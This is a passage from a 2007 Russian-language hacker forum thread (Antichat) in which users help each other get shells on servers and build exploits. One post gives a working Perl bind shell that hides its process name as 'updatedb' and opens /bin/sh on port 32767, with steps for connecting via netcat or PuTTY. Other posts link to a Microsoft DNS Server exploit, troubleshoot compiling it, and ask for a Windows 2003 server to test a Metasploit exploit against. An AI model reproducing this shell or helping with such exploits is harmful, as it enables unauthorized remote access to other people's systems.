ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 24.03.2007, 22:25
Аватар для nobi
nobi
Участник форума
Регистрация: 18.01.2007
Сообщений: 172
Провел на форуме:
316062

Репутация: 39
Отправить сообщение для nobi с помощью ICQ
По умолчанию

та тут вобше не выполняется perl
или с начало надо на нет скане а потом пёрл-бин запускать
подскажите плызз
 
Ответить с цитированием

  #52  
Старый 27.03.2007, 04:14
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

nobi, попробуй с помощью шелла порт открыть. Читай пост тохи на первой странице темы
 
Ответить с цитированием

  #53  
Старый 27.03.2007, 05:28
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Цитата:
та тут вобше не выполняется perl
или с начало надо на нет скане а потом пёрл-бин запускать
подскажите плызз
bind.pl
perl /путь_до_скрипта/bind.pl
потом с помощью putty или тот же NetCat => конектишься
PHP код:
#!/usr/bin/perl

$port 32767
$port $ARGV[0] if $ARGV[0];
exit if 
fork;
$
"updatedb" " " x100;
$SIG{CHLD} = 'IGNORE';
use 
Socket;
socket(SPF_INETSOCK_STREAM0);
setsockopt(SSOL_SOCKETSO_REUSEADDR1);
bind(Ssockaddr_in($portINADDR_ANY));
listen(S50);
while(
1)
{
accept(XS);
unless(fork)
{
open STDIN"<&X";
open STDOUT">&X";
open STDERR">&X";
close X;
exec("/bin/sh");
}
close X;

NetCat => ip_адресс_ресурса 32767 (enter)
putty => Host Name (or IP address) там пишим IP_адрес_ресурса(можно и просто адресс ресурса) => Port 32767 => OPEN
скрин

Последний раз редактировалось KPOT_f!nd; 27.03.2007 в 05:31..
 
Ответить с цитированием

  #54  
Старый 17.04.2007, 14:08
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Есть сплоент на С
Лежит тут (скачал только по первой сссылке)
http://www.514.es/Microsoft_Dns_Server_Exploit.zip
http://www.48bits.com/exploits/dnsxpl.rar
http://www.milw0rm.com/sploits/04152007-dnsxpl.rar
(в архиве 4 файла Makefile, dnsxpl.Acf, dnsxplc.c, dnsxpl.Idl)
Вопрос: я локально его не соберу у себя на компе под виндой? lcc-win32 ? (http://www.cs.virginia.edu/~lcc-win32/lccwin32.exe) Пробовал компилить выдаёт 260 ошибок.
Пробовал переименовать dnsxpl.Idl в dnsxpl.h в папке includ - всё равно ошибки.

P.S. Он наверно для никсов (исходник то, раз makefile есть) и я зря под виндой пытаюсь ?
 
Ответить с цитированием

  #55  
Старый 17.04.2007, 14:29
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

попробуй откомпилить под cygwin'ом. компилит юниксовые сплоиты в *.exe

Последний раз редактировалось p-range; 17.04.2007 в 14:35..
 
Ответить с цитированием

  #56  
Старый 17.04.2007, 15:16
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Этот эксплоит сосвем не для *nix. собирается, по идее, он вполне нормально под Windows.
dnsxpl.Idl - это файл interface defenition language (языка описания интерфейса). А насчёт makefile - жжоте =) Кто ж сказал что если makefile, то под никсы...

UPD: однако собрать у меня тоже не получилось. Кроме того смущает наличие в сырцах:
#include "dnsxpl.h"
который отсутствует в архиве.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....

Последний раз редактировалось ShadOS; 17.04.2007 в 15:25..
 
Ответить с цитированием

  #57  
Старый 17.04.2007, 16:26
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Дайте мне dns сервер вынь 2003 En - кому не жалко, затестю слоит от MSF 3.0
 
Ответить с цитированием

  #58  
Старый 17.04.2007, 16:29
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Цитата:
Сообщение от ShadOS  
Кроме того смущает наличие в сырцах:
#include "dnsxpl.h"
который отсутствует в архиве.
Точнее во всех трёх архивах...

значит эта библиотека где-то должна быть!? В каком-то компиляторе ?
 
Ответить с цитированием

  #59  
Старый 17.04.2007, 17:43
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от -=lebed=-  
Точнее во всех трёх архивах...

значит эта библиотека где-то должна быть!? В каком-то компиляторе ?
Агррр... сам догадаешься или подсказать?!
dnsxpl сокращение от DNS EXPLOIT. На самом деле эта библиотека там нах ненужна. Прототипы функций уже указанны.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #60  
Старый 18.04.2007, 09:08
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Я вот не мойму, кроме ShadOS, исходники кто-нибудь посмотрел ? Я Си в школе узучал ещё и то поверхностно, щас даже синтаксис плохо помню, но, посмотрев код, там любой дурак (хоть кто более-менее знаком с программированием, поймёт, что что-то не так с dnsxpl.h. Придётся править сплоит самому полностю... (хотя бы добьюсь чтоб скомпилировался). В определении переменных - тоже ошибки, да и не соответствие типов имеет место... Где ВЫ кодеры на Cи - помогите сплоит подправить...
 
Ответить с цитированием
Ответ


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новые сплойты Ms Ie melco Защита ОС: вирусы, антивирусы, файрволы. 3 27.09.2006 10:57
Уязвимости форума YaBB 1 Gold - Release и сплойты к нему asma2k Форумы 5 06.01.2006 02:00
чем исполнять ява сплойты? Danya Болталка 2 17.12.2005 03:31



TEST QR: []
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ